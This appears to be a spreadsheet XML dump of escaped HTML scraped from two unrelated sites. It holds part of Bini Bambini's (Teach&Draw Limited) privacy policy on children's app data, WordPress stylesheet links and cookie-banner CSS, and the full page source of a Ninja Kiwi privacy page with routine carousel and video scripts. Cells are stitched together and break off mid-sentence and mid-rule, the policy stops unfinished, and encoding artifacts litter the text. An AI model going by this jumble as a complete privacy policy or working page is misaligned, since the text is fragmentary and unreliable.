                &lt;div class="header__center flex-wrap middle-xs center-xs"&gt;_x005F_x000D_
                    &lt;ul class="header__soc flex-wrap"&gt;_x005F_x000D_
	                    &lt;li&gt;&lt;a class="header__soc-item" href="https://www.pinterest.com/BiniBambini_/" target="_blank" rel="nofollow"&gt;&lt;i class="icon icon-pinterest"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a class="header__soc-item" href="https://www.facebook.com/binibambinipage/" target="_blank" rel="nofollow"&gt;&lt;i class="icon icon-facebook"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a class="header__soc-item" href="https://www.instagram.com/bini.bambini/?hl=en" target="_blank" rel="nofollow"&gt;&lt;i class="icon icon-instagram"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a class="header__soc-item" href="https://www.youtube.com/channel/UCzNqervZjsZCgNaWLMwlOSA" target="_blank" rel="nofollow"&gt;&lt;i class="icon icon-youtube"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;                    &lt;/ul&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                &lt;div class="header__right flex-wrap middle-xs end-xs"&gt;_x005F_x000D_
	                                    &lt;a href="/catalog-page/" class="btn btn--blue try-it-now"&gt;Try it now&lt;/a&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t xml:space="preserve">x000D_
                    &lt;div class="header__right-item hidden-tablet"&gt;_x005F_x000D_
                        &lt;div class="header__lang"&gt;_x005F_x000D_
	                            _ x000D_
	                                                                                                        &lt;div class="js_drop dropdown"&gt;_x005F_x000D_
                                            &lt;div class="btn btn-- light-blue"&gt;            &lt;span&gt;English&lt;/span&gt;
		 &lt;i class="icon icon-caret"&gt;&lt;/i&gt;&lt;/div&gt;_x005F_x000D_
                                            </t>
  </si>
  <si>
    <t>&lt;ul class="dropdown__list js_dropdown"&gt;_x005F_x000D_
                                                                                                                                                                                                                                                    &lt;li&gt;_x005F_x000D_
                                                                    &lt;a                     href="https://binibambini.com/uk/privacy-policy/" class="dropdown__item" role="button" aria-expanded="false"&gt;
								                &lt;span&gt;Українська&lt;/span&gt;
				            &lt;/a&gt;
		                                                    &lt;/li&gt;_x005F_x000D_
                                                                                                                                                                                                         &lt;li&gt;_x005F_x000D_
                                                                    &lt;a                     href="https://binibambini.com/ru/privacy-policy/" class="dropdown__item" role="button" aria-expanded="false"&gt;
								                &lt;span&gt;Русский&lt;/span&gt;
				            &lt;/a&gt;
		                                                    &lt;/li&gt;_x005F_x000D_
                                                                                                                                                &lt;/ul&gt;_x005F_x000D_
                                        &lt;/div&gt;_x005F_x000D_
                                                                                                &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
	                                            &lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
    &lt;/header&gt;_x005F_x000D_
&lt;main class="main"&gt;
	&lt;div class="vc_row wpb_row vc_row-fluid"&gt;&lt;div class="wpb_column vc_column_container vc_col-sm-12"&gt;&lt;div class="vc_column-inner"&gt;&lt;div class="wpb_wrapper"&gt;&lt;div class='binibambini-box  container  vc_custom_1613654968800 '&gt;
	&lt;div class="wpb_text_column wpb_content_element " &gt;
		&lt;div class="wpb_wrapper"&gt;
			&lt;h1&gt;Privacy policy&lt;/h1&gt;
&lt;p&gt;Hi All,&lt;/p&gt;
&lt;p&gt;We, Teach&amp;amp;Draw Limited, a company incorporated under the laws of the Republic of Cyprus, registered address: Faneromenis, 106, 2nd floor, flat/office 201, 6031, Larnaca, Cyprus, registration number: HE385979 (hereinafter referred to as “We”, “Company”, and “Bini Bambini”), have prepared this Privacy Policy (the “Policy”) to show how responsibly and seriously we treat the privacy of information, including personal data, of our applications users and visitors of http://teachdraw.com (the “website”).&lt;/p&gt;
&lt;p&gt; This Policy will help you understand:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– what is personal data;&lt;/li&gt;
&lt;li&gt;– what personal data we collect;&lt;/li&gt;
&lt;li&gt;– how and why we collect it;&lt;/li&gt;
&lt;li&gt;– whom we can share personal data with;&lt;/li&gt;
&lt;li&gt;– how to contact us if you have any questions regarding personal data processing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Personal data protection statement&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We strive to protect the privacy of personal data that we obtain and process. During data processing, the Company undertakes to take all necessary technical and regulatory action in strict compliance with applicable law and solely upon legal grounds permitting any such processing.&lt;/p&gt;
&lt;p&gt;All our applications and services that are available for use on mobile devices, personal computers, or any other platforms including the website, to the extent related to personal data processing and protection are governed by this Privacy Policy. Therefore, by using any of our applications and/or services you agree with this Policy.&lt;/p&gt;
&lt;p&gt;If you do not want us to collect and process information about you in accordance with this Policy, you may not, unfortunately, use our applications and/or services.&lt;/p&gt;
&lt;p&gt;When we control data collection methods and identify the goals for which such data is used, the Company becomes the “data controller” for the purposes of the EU General Data Protection Regulation (the “GDPR”), the UK Data Protection Act 2018, and any other European data protection legislation.</t>
  </si>
  <si>
    <t>Under the Law of Ukraine on Personal Data Protection of June 1, 2010, the Company is the “personal data owner”. We may also be the “data operator” under the 1998 Children’s Online Privacy Protection Rule (the “COPPA”).&lt;/p&gt;
&lt;p&gt;We process personal data only upon at least one of the following legitimate grounds for such processing, including but not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– you consented to your data processing;&lt;/li&gt;
&lt;li&gt;– processing is required to execute or fulfil an agreement with you (including any offer and acceptance), including when you are using our applications / services;&lt;/li&gt;
&lt;li&gt;– such processing is required under the legislation of the countries to which we provide our services or make our applications / services available;&lt;/li&gt;
&lt;li&gt;– processing is required for the purposes of any legitimate interests of the Company as the controller or third party (unless where interests pertaining to fundamental rights and freedoms of the data subject that require data protection prevail over the above interests).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At the same time, please note that we do not request special categories of personal data of our users / visitors.&lt;/p&gt;
&lt;p&gt;Please note that our Privacy Policy may be updated from time to time, including if required by applicable law.</t>
  </si>
  <si>
    <t>We suggest that you might want to review this Policy from time to time to see if there are any modifications. Your continued use of the applications or services after this Policy has been updated means your consent to such update. If you do not agree to the updates, you may refuse to use our applications / services (in particular, by removing the applications from your devices).&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Anyway, you can always delete or re-install an application on your mobile device to delete or change the personal data accordingly.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;How we obtain personal data&lt;/b&gt;&lt;/p&gt;
&lt;p&gt; The Company may obtain your data from various sources and with various aims, including, without limitation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– when you play our games or use other services in applications or on the website;&lt;/li&gt;
&lt;li&gt;– when you make a purchase through our applications (such as a PRO plan of an application or certain game characters);&lt;/li&gt;
&lt;li&gt;– when you create an account on our website;&lt;/li&gt;
&lt;li&gt;– when you watch ads in our applications;&lt;/li&gt;
&lt;li&gt;– when you subscribe to our promotional mailing;&lt;/li&gt;
&lt;li&gt;– when you contact our user support centre;&lt;/li&gt;
&lt;li&gt;– when you talk to other users of our applications in a special chat;&lt;/li&gt;
&lt;li&gt;– when you apply for a job (send your CV using any communication channel).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Our applications can gather information based on the analysis of actions taken during their use.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;What personal data we collect and process&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;(A) The following information about you can be collected and processed by our applications and/or services used by you, including the website:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– geo location (country, state or region, GPS location);&lt;/li&gt;
&lt;li&gt;– device information (such as device name / model, operating system, browser information, including browser type and language settings);&lt;/li&gt;
&lt;li&gt;– device IDs and advertisement ID (if authorised by the user);&lt;/li&gt;
&lt;li&gt;– game progress and activities (such as remembering the language selected by the user and level of difficulty at a certain stage of use);&lt;/li&gt;
&lt;li&gt;– Information that we collect using cookies and similar technologies (please read our separate &lt;a href="/cookie-policy/"&gt;Cookie Policy&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;(B)</t>
  </si>
  <si>
    <t>The following information can be provided by you to use or our partners (third parties) during the use of our applications, services, and website:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– age;&lt;/li&gt;
&lt;li&gt;– name;&lt;/li&gt;
&lt;li&gt;– contact details (such as email or phone number);&lt;/li&gt;
&lt;li&gt;– images / photos;&lt;/li&gt;
&lt;li&gt;– social media profiles;&lt;/li&gt;
&lt;li&gt;– bank / credit card details;&lt;/li&gt;
&lt;li&gt;– work experience and skills (CV).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;(C) In addition to the above, we can also process other personal data, if you voluntarily submit it to the Company.&lt;/p&gt;
&lt;p&gt; However, if data processing is not required for using our applications and/or services by you, or is not explicitly required by law, we will delete it.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Children’s data&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We treat a user / customer as a child if they are under 13 years of age, unless different age limitations apply in their country (in certain countries these are individuals under 16).&lt;/p&gt;
&lt;p&gt; We do not intentionally collect and process children’s personal data. However, the Company understands that the target audience of our applications may include children, and that among its users there are probably parents with children who might be ordering services for children (such as buying a PRO plan or characters in the application).&lt;/p&gt;
&lt;p&gt;Parents or any other legitimate representatives who order the relevant services for children have to accept the terms of use of the relevant application and/or service of the Company and this Policy, and will be responsible for the accuracy of the data submitted and provision of the relevant service to the child.&lt;/p&gt;
&lt;p&gt;Acceptance of the terms of use and this Policy and continued use of any of our applications</t>
  </si>
  <si>
    <t>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 important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='fbrev_css-css'  href='https://binibambini.com/wp-content/plugins/fb-reviews-widget/static/css/facebook-review.css?ver=1.7.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='sb_instagram_styles-css'  href='https://binibambini.com/wp-content/plugins/instagram-feed/css/sb-instagram-2-2.min.css?ver=2.4.6' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css'  href='https://binibambini.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='contact-form-7-css'  href='https://binibambini.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='flexboxgrid-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/flexboxgrid/dist/flexboxgrid.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fancybox-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/fancybox/dist/jquery.fancybox.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='select2-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/select2/dist/css/select2.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='raty-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/raty-js/lib/jquery.raty.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='swiper-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/swiper/dist/css/swiper.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='main-style-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/css/main.css?ver=22:55:51' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='dev-style-temporary-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/css/dev-temp.css?ver=22:55:51' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='app-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/css/app.a7b44abb.css?ver=22:55:51' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='moove_gdpr_frontend-css'  href='https://binibambini.com/wp-content/plugins/gdpr-cookie-compliance/dist/styles/gdpr-main.css?ver=4.5.8' type='text/css' media='all' /&gt;
&lt;style id='moove_gdpr_frontend-inline-css' type='text/css'&gt;
#moove_gdpr_cookie_modal,#moove_gdpr_cookie_info_bar,.gdpr_cookie_settings_shortcode_content{font-family:Nunito,sans-serif}#moove_gdpr_save_popup_settings_button{background-color:#373737;color:#fff}#moove_gdpr_save_popup_settings_button:hover{background-color:#000}#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton,#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton{background-color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder a.mgbutton,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton,.gdpr_cookie_settings_shortcode_content .gdpr-shr-button.button-green{background-color:#ff008c;border-color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder a.mgbutton:hover,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton:hover,.gdpr_cookie_settings_shortcode_content .gdpr-shr-button.button-green:hover{background-color:#fff;color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close span.gdpr-icon{background-color:#ff008c;border:1px solid #ff008c}#moove_gdpr_cookie_info_bar span.change-settings-button.focus-g{-webkit-box-shadow:0 0 1px 3px #ff008c;-moz-box-shadow:0 0 1px 3px #ff008c;box-shadow:0 0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
 &lt;title&gt;Ninja Kiwi&lt;/title&gt;
&lt;link rel="canonical" href="https://ninjakiwi.com/privacy_policy"&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;
&lt;link rel="icon" type="image/png" href="/website/NKSiteDesign/img/favicon_32.ico"&gt;
&lt;link rel="stylesheet" href="https://cdn.nkstatic.com/website/bootstrap/bootstrap.min.css" crossorigin="anonymous"&gt;
&lt;link href="https://fonts.googleapis.com/ css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&amp;display=swap" rel="stylesheet"&gt; 
&lt;link rel="stylesheet" href="https://unpkg.com/swiper@6.8.4/swiper-bundle.min.css"&gt;
&lt;link rel="stylesheet" type="text/css" href="/website/style/animate.css" crossorigin="anonymous"&gt;
&lt;link rel="stylesheet" href="//cdn.nkstatic.com/website/style/all.css" crossorigin="anonymous"&gt;
&lt;link href="https://vjs.zencdn.net/7.8.4/video-js.css" rel="stylesheet" /&gt;
&lt;link rel="stylesheet" href="https://cdn.nkstatic.com/website/style/styles.min.css" crossorigin="anonymous"&gt;
&lt;link href="/website/NKSiteDesign/css/all.min.css" rel="stylesheet"&gt; 
&lt;meta content="authenticity_token" name="csrf-param" /&gt;
&lt;meta content="9Yu4df7QwdfBneeROWompJcaO0UCQCARIPgoRIy+Rzg=" name="csrf-token" /&gt;
&lt;/head&gt;
&lt;body id="-page" data-user="" class="text-light -area"&gt;
&lt;container class="nk-dark bg-dark"&gt;
&lt;div class="header"&gt;
&lt;a href="/" class="header_logo_link"&gt;&lt;img class="header_logo" src="https://assets.ninjakiwi.com/images/Ninja_Kiwi_Logo_Horizontal_NoBG_WhiteText_NoMoto.svg" alt=""&gt;&lt;/a&gt;
&lt;div class="header_nav"&gt;
&lt;a class="nav_link" href="/"&gt;Home&lt;/a&gt;
&lt;a class="nav_link" href="" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"&gt;Games &lt;i style="opacity: 0.5;" class="fas fa-fw fa-caret-down"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;div class="dropdown-menu"&gt;
&lt;a class="dropdown-item" href="/our-games"&gt;Our Games&lt;/a&gt;
&lt;div class="dropdown-divider"&gt;&lt;/div&gt;
&lt;a class="dropdown-item" href="/archive"&gt;Web Game Archive&lt;/a&gt;
&lt;/div&gt;
&lt;a class="nav_link" href="/blog"&gt;Blog&lt;/a&gt;
&lt;a class="nav_link" href="/videos"&gt;Watch&lt;/a&gt;
&lt;a class="nav_link" href="https://store.ninjakiwi.com/"&gt;Merch&lt;/a&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/support" target="_blank"&gt;Support&lt;/a&gt;
&lt;/div&gt;
&lt;div class="header_socials"&gt;
&lt;div class="header_socials_icons"&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/insta" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Follow us on Instagram"&gt;&lt;i class="nav_icon fab fa-fw fa-instagram"&gt;&lt;/i&gt;&lt;/a&gt;
</t>
  </si>
  <si>
    <t>&lt;a class="nav_link" href="https://ninja.kiwi/reddit" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Join our Subreddit"&gt;&lt;i class="nav_icon fab fa-fw fa-reddit-square"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/discord" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Join our Discord community"&gt;&lt;i class="nav_icon fab fa-fw fa-discord"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/youtube" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Subscribe to us on YouTube"&gt;&lt;i class="nav_icon fab fa-fw fa-youtube-square"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/twitter" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Follow us on Twitter"&gt;&lt;i class="nav_icon fab fa-fw fa-twitter-square"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a class="nav_link" href="https://ninja.kiwi/facebook" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Like us on Facebook"&gt;&lt;i class="nav_icon fab fa-fw fa-facebook-square"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;div class="header_socials_account"&gt;
&lt;div class="header_socials_icons"&gt;
&lt;a class="nav_link" href="/login" data-toggle="tooltip" data-placement="bottom" title="Website Login"&gt;&lt;i class="nav_icon fab fa fa-question-circle"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="header_tray"&gt;
&lt;a class="nav_link mr-0 pr-0 ml-3" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" href=""&gt;&lt;i class="nav_icon far fa-fw fa-bars"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;div class="dropdown-menu dropdown-menu-right"&gt;
&lt;a class="dropdown-item" href="/"&gt;Home&lt;/a&gt;
&lt;a class="dropdown-item" href="/our-games"&gt;Our Games&lt;/a&gt;
&lt;a class="dropdown-item" href="/archive"&gt;Web Game Archive&lt;/a&gt;
&lt;a class="dropdown-item" href="/blog"&gt;Blog&lt;/a&gt;
&lt;a class="dropdown-item" href="/videos"&gt;Watch&lt;/a&gt;
&lt;a class="dropdown-item" href="https://store.ninjakiwi.com/"&gt;Merch&lt;/a&gt;
&lt;a class="dropdown-item" href="https://ninja.kiwi/support" target="_blank"&gt;Support&lt;/a&gt;
&lt;div class="dropdown-divider"&gt;&lt;/div&gt;
&lt;a class="dropdown-item" href="/register#login"&gt;Log In&lt;/a&gt;
&lt;a class="dropdown-item" href="/register#register"&gt;Register Account&lt;/a&gt;
&lt;div class="dropdown-divider"&gt;&lt;/div&gt;
&lt;div class="dropdown-item dropdown-socials d-flex justify-content-between align-items-center"&gt;
&lt;a href="https://ninja.kiwi/twitter" target="_blank"&gt;
&lt;i class="nav_icon fab fa-fw fa-twitter-square"&gt;&lt;/i&gt;
&lt;/a&gt;
&lt;a href="https://ninja.kiwi/youtube" target="_blank"&gt;
&lt;i class="nav_icon fab fa-fw fa-youtube-square"&gt;&lt;/i&gt;
&lt;/a&gt;
&lt;a href="https://ninja.kiwi/discord" target="_blank"&gt;
&lt;i class="nav_icon fab fa-fw fa-discord"&gt;&lt;/i&gt;
&lt;/a&gt;
&lt;a href="https://ninja.kiwi/reddit" target="_blank"&gt;
&lt;i class="nav_icon fab fa-fw fa-reddit-square"&gt;&lt;/i&gt;
&lt;/a&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/container&gt;
&lt;div class="hero"&gt;
&lt;img class="hero_image" style="opacity: 0.7; filter: blur(3px);" src="https://static-api.nkstatic.com/appdocs/4/assets/assets/8d1baf8a93cfb9719d1575299d725567_redreign_short.jpg" alt=""&gt;
&lt;div class="hero_text"&gt;Privacy Policy&lt;/div&gt;
&lt;/div&gt;
&lt;div class="nk_container"&gt;
&lt;div class="nk_card nk"&gt;
&lt;iframe src="https://static-api.nkstatic.com/appdocs/4/appdocs/privacy_iframe.html?#body { color:#eee}" style="width:100%;height:500px;border:0"&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="nk_footer text-white"&gt;
&lt;div class="nk_footer_content"&gt;
&lt;div class="row w-100 m-0"&gt;
&lt;div class="col-lg-4 p-0 d-flex align-items-center justify-content-center"&gt;
&lt;div class="nk_footer_sitemap"&gt;
&lt;div&gt;
&lt;a class="nk_footer_link" href="/all-games"&gt;Games&lt;/a&gt;&lt;span class="mx-3" style="opacity: 0.65;"&gt;|&lt;/span&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a class="nk_footer_link" href="/blog"&gt;Blog&lt;/a&gt;&lt;span class="mx-3" style="opacity: 0.65;"&gt;|&lt;/span&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a class="nk_footer_link" href="/videos"&gt;Watch&lt;/a&gt;&lt;span class="mx-3" style="opacity: 0.65;"&gt;|&lt;/span&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a class="nk_footer_link" href="https://www.reddit.com/r/NinjaKiwiOfficial/"&gt;Community&lt;/a&gt;&lt;span class="mx-3" style="opacity: 0.65;"&gt;|&lt;/span&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a class="nk_footer_link" href="https://support.ninjakiwi.com/"&gt;Support&lt;/a&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="col-lg-4 p-0 my-3"&gt;
&lt;div class="h-100 d-flex flex-column justify-content-center align-items-center"&gt;
&lt;img height="40px" src="https://cdn.nkstatic.com/images/NK_Logo_White.png" alt="Ninja Kiwi"&gt;
&lt;div style="opacity: 0.95;" class="d-flex align-items-center my-2"&gt;
&lt;a class="link_white" href="https://ninjakiwi.com/terms"&gt;Terms&lt;/a&gt;
&lt;span class="mx-3" style="opacity: 0.4;"&gt;|&lt;/span&gt;
&lt;a class="link_white" href="https://ninjakiwi.com/privacy"&gt;Privacy&lt;/a&gt;
&lt;/div&gt;
&lt;p class="nk_copyright"&gt;&lt;i class="fal fa-fw fa-copyright"&gt;&lt;/i&gt; 2021
Ninja
Kiwi Ltd.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="col-lg-4 p-0"&gt;
&lt;div class="nk_footer_socials"&gt;
&lt;a class="nk_footer_icon" href="https://ninja.kiwi/insta" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Follow us on Instagram"&gt;&lt;i class=" fab fa-fw fa-instagram"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a class="nk_footer_icon ml-2" href="https://ninja.kiwi/reddit" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Join our Subreddit"&gt;&lt;i class=" fab fa-fw fa-reddit-square"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a class="nk_footer_icon ml-2" href="https://ninja.kiwi/discord" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Join our Discord community"&gt;&lt;i class=" fab fa-fw fa-discord"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a class="nk_footer_icon ml-2" href="https://ninja.kiwi/youtube" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Subscribe to us on YouTube"&gt;&lt;i class=" fab fa-fw fa-youtube-square"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a class="nk_footer_icon ml-2" href="https://ninja.kiwi/twitter" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Follow us on Twitter"&gt;&lt;i class=" fab fa-fw fa-twitter-square"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a class="nk_footer_icon ml-2" href="https://ninja.kiwi/facebook" target="_blank" data-toggle="tooltip" data-placement="bottom" title="Like us on Facebook"&gt;&lt;i class=" fab fa-fw fa-facebook-square"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"&gt;&lt;/script&gt;
&lt;script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js"&gt;&lt;/script&gt;
&lt;script src="//cdn.nkstatic.com/assets/application-f08cb9e43a432ab071d8d9ca583d83da.js" type="text/javascript"&gt;&lt;/script&gt;
&lt;script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js" integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script src="https://cdn.nkstatic.com/website/bootstrap/bootstrap.min.js" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script src="https://unpkg.com/swiper@6.8.4/swiper-bundle.min.js"&gt;&lt;/script&gt;
&lt;script src="https://vjs.zencdn.net/7.8.4/video.js"&gt;&lt;/script&gt;
&lt;script src="/website/js/scripts.js?2"&gt;&lt;/script&gt;
&lt;script&gt;
				var videoEl = document.querySelector("#videojs_Trailer");
				if(videoEl)
				{
					var video_Trailer = videojs(videoEl, {
						controls: true,
						autoplay: 'muted',
						preload: 'auto',
						fluid: true,
						aspectRatio: "16:9",
						inactivityTimeout: 1000,
						controlBar: {
							progressControl: {
								seekBar: false,
							},
							'pictureInPictureToggle': false
						},
					});
				}
		    &lt;/script&gt;
&lt;script&gt;
				        var swiperMerch = new Swiper('#swiper_Merch', {
				            slidesPerView: 1,
				            spaceBetween: 10,
									 autoHeight: true,
				            // init: false,
				            // pagination: {
				            //     el: '.swiper-pagination',
				            //     clickable: true,
				            // },
				            navigation: {
				                nextEl: '#swiperNext_Merch',
				                prevEl: '#swiperPrev_Merch',
				            },
				            loop: true,
				            breakpoints: {
				                640: {
				                    slidesPerView: 2,
				                    spaceBetween: 15,
				                },
				                768: {
				                    slidesPerView: 4,
				                    spaceBetween: 25,
				                },
				                1024: {
				                    slidesPerView: 5,
				                    spaceBetween: 35,
				                },
				            }
				        });
				    &lt;/script&gt;
&lt;script&gt;
				        var swiperWallpapers = new Swiper('#swiper_Wallpapers', {
				            slidesPerView: 1,
				            spaceBetween: 10,
				            autoplay: true,
				            // init: false,
				            // pagination: {
				            //     el: '.swiper-pagination',
				            //     clickable: true,
				            // },
				            navigation: {
				                nextEl: '#swiperNext_Wallpapers',
				                prevEl: '#swiperPrev_Wallpapers',
				            },
				            loop: true,
				            breakpoints: {
				                640: {
				                    slidesPerView: 1,
				                    spaceBetween: 15,
				                },
				                768: {
				                    slidesPerView: 1,
				                    spaceBetween: 25,
				                },
				                1024: {
				                    slidesPerView: 3,
				                    spaceBetween: 35,
				                },
				            }
				        });
				    &lt;/script&gt;
&lt;script&gt;
				        var swiperTrailers = new Swiper('#swiper_Trailers', {
				            pagination: {
				                el: '#swiperPage_Trailers',
				                clickable: true,
				                renderBullet: function (index, className) {
				                    if (index === 0)
				                        return `&lt;i class="fa-swiper ${className} fas mx-1 fa-xs fa-play"&gt;&lt;/i&gt;`;
				                    else
				                        return `&lt;i class="fa-swiper ${className} fas mx-1 fa-xs fa-circle"&gt;&lt;/i&gt;`;
				                },
				            },
				            loop: true
				        });
				        // Move to next slide when trailer has finished
						if(video_Trailer)        
						{
							video_Trailer.on('ended', function () {
								swiperTrailers.slideNext();
								swiperTrailers.autoplay.start();
							});
							// Pause video when leaving video slide, play video when arriving on video slide
							swiperTrailers.on('transitionEnd', function () {
								let index = swiperTrailers.realIndex;
								if (index &gt; 0) {
									// Pause video
									video_Trailer.pause();
								}
								else if (index === 0) {
									video_Trailer.play();
								}
							});
						}
						else
							swiperTrailers.autoplay.start();
				    &lt;/script&gt;
&lt;script&gt;
						        var swiperCategories = new Swiper('#swiper_Categories', {
						            slidesPerView: 1,
						            spaceBetween: 10,
											 	autoHeight: true,
												autoplay: true,
						            // init: false,
						            // pagination: {
						            //     el: '.swiper-pagination',
						            //     clickable: true,
						            // },
						            navigation: {
						                nextEl: '#swiperNext_Merch',
						                prevEl: '#swiperPrev_Merch',
						            },
						            loop: true,
						            breakpoints: {
						                640: {
						                    slidesPerView: 2,
						                    spaceBetween: 15,
						                },
						                768: {
						                    slidesPerView: 3,
						                    spaceBetween: 15,
						                },
						                1024: {
						                    slidesPerView: 5,
